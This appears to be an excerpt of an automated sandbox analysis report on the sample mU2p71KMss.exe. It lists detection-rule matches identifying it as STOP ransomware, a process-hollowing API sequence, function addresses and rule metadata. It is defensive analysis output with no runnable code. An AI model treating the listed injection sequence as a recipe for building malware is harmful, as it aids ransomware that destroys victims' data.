          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 348, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2716, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 1896, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 5968, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 5524, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 4748, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 4144, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: mU2p71KMss.exe PID: 2616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DD0110
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_05DE0110
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_004056530_2_00405653
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD35200_2_05DD3520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD75200_2_05DD7520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DFD7F10_2_05DFD7F1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDA79A0_2_05DDA79A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDC7600_2_05DDC760
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDE6E00_2_05DDE6E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDA6990_2_05DDA699
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E1B69F0_2_05E1B69F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DFD1A40_2_05DFD1A4
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E1E1410_2_05E1E141
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD91200_2_05DD9120
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DE00D00_2_05DE00D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD30F00_2_05DD30F0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD70E00_2_05DD70E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDB0B00_2_05DDB0B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDB0000_2_05DDB000
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DEF0300_2_05DEF030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDA0260_2_05DDA026
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD73930_2_05DD7393
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E1E37C0_2_05E1E37C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E522C00_2_05E522C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD72200_2_05DD7220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD5DF70_2_05DD5DF7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD5DE70_2_05DD5DE7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E12D1E0_2_05E12D1E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05E04E9F0_2_05E04E9F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD8E600_2_05DD8E60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD89D00_2_05DD89D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD59F70_2_05DD59F7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DFF9B00_2_05DFF9B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DFE9A30_2_05DFE9A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDA9160_2_05DDA916
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DF18D00_2_05DF18D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD78800_2_05DD7880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDDBE00_2_05DDDBE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD2B600_2_05DD2B60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DE0B000_2_05DE0B00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD7A800_2_05DD7A80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DDCA100_2_05DDCA10
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040D2401_2_0040D240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F901_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040C0701_2_0040C070
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042E0031_2_0042E003
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004080301_2_00408030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004101601_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004021C01_2_004021C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044237E1_2_0044237E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004084C01_2_004084C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004344FF1_2_004344FF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0043E5A31_2_0043E5A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040A6601_2_0040A660
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0041E6901_2_0041E690
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004067401_2_00406740
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004027501_2_00402750
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040A7101_2_0040A710
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004087801_2_00408780
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042C8041_2_0042C804
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004068801_2_00406880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004349F31_2_004349F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004069F31_2_004069F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00402B801_2_00402B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00406B801_2_00406B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044ACFF1_2_0044ACFF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042CE511_2_0042CE51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00434E0B1_2_00434E0B
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00406EE01_2_00406EE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00420F301_2_00420F30
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004050571_2_00405057
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042F0101_2_0042F010
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004070E01_2_004070E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004391F61_2_004391F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004352401_2_00435240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004C93431_2_004C9343
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004054471_2_00405447
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004054571_2_00405457
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004495061_2_00449506
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044B5B11_2_0044B5B1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004356751_2_00435675
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004096861_2_00409686
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040F7301_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044D7A11_2_0044D7A1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004819201_2_00481920
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0044D9DC1_2_0044D9DC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00449A711_2_00449A71
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00443B401_2_00443B40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409CF91_2_00409CF9
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040DD401_2_0040DD40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00427D6C1_2_00427D6C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0040BDC01_2_0040BDC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409DFA1_2_00409DFA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00409F761_2_00409F76
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0046BFE01_2_0046BFE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00449FE31_2_00449FE3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE35204_2_05DE3520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE75204_2_05DE7520
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0D7F14_2_05E0D7F1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA79A4_2_05DEA79A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEC7604_2_05DEC760
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEE6E04_2_05DEE6E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA6994_2_05DEA699
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2B69F4_2_05E2B69F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0D1A44_2_05E0D1A4
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2E1414_2_05E2E141
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE91204_2_05DE9120
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DF00D04_2_05DF00D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE30F04_2_05DE30F0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE70E04_2_05DE70E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEB0B04_2_05DEB0B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEB0004_2_05DEB000
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DFF0304_2_05DFF030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA0264_2_05DEA026
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE73934_2_05DE7393
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2E37C4_2_05E2E37C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E622C04_2_05E622C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE72204_2_05DE7220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE5DF74_2_05DE5DF7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE5DE74_2_05DE5DE7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E22D1E4_2_05E22D1E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E14E9F4_2_05E14E9F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE8E604_2_05DE8E60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE89D04_2_05DE89D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE59F74_2_05DE59F7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0E9A34_2_05E0E9A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0F9B04_2_05E0F9B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA9164_2_05DEA916
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E018D04_2_05E018D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE78804_2_05DE7880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEDBE04_2_05DEDBE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE2B604_2_05DE2B60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DF0B004_2_05DF0B00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE7A804_2_05DE7A80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DECA104_2_05DECA10
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00419F905_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040C0705_2_0040C070
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042E0035_2_0042E003
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004080305_2_00408030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004101605_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004021C05_2_004021C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044237E5_2_0044237E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004084C05_2_004084C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004344FF5_2_004344FF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0043E5A35_2_0043E5A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040A6605_2_0040A660
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0041E6905_2_0041E690
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004067405_2_00406740
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004027505_2_00402750
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040A7105_2_0040A710
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004087805_2_00408780
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042C8045_2_0042C804
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004068805_2_00406880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004349F35_2_004349F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004069F35_2_004069F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00402B805_2_00402B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00406B805_2_00406B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044ACFF5_2_0044ACFF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042CE515_2_0042CE51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00434E0B5_2_00434E0B
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00406EE05_2_00406EE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00420F305_2_00420F30
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004050575_2_00405057
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042F0105_2_0042F010
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004070E05_2_004070E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004391F65_2_004391F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040D2405_2_0040D240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004352405_2_00435240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004C93435_2_004C9343
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004054475_2_00405447
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004054575_2_00405457
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004495065_2_00449506
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044B5B15_2_0044B5B1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004356755_2_00435675
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004096865_2_00409686
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040F7305_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044D7A15_2_0044D7A1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004819205_2_00481920
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044D9DC5_2_0044D9DC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00449A715_2_00449A71
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00443B405_2_00443B40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409CF95_2_00409CF9
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040DD405_2_0040DD40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00427D6C5_2_00427D6C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040BDC05_2_0040BDC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409DFA5_2_00409DFA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409F765_2_00409F76
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0046BFE05_2_0046BFE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00449FE35_2_00449FE3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05DF8EC0 appears 57 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00428C81 appears 84 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00420EC2 appears 40 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 004547A0 appears 150 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00422587 appears 48 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E10160 appears 50 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E08EC0 appears 57 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0042F7C0 appears 194 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0044F23E appears 106 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00428520 appears 154 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E00160 appears 50 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00425007 appears 36 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00450870 appears 52 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00454E50 appears 82 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00441A25 appears 44 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0044F26C appears 40 times
          Source: mU2p71KMss.exe, 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000001.00000000.1987483622.00000000040A1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000001.00000003.2003281151.00000000030B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000004.00000002.2012281123.00000000040A1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000005.00000000.2010038199.00000000040A1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000006.00000000.2017321757.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000007.00000000.2021981173.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000009.00000002.2155871497.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000A.00000000.2152407463.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000C.00000002.2241186522.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000D.00000000.2236703964.00000000040A1000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exeBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe.1.drBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe.7.drBinary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
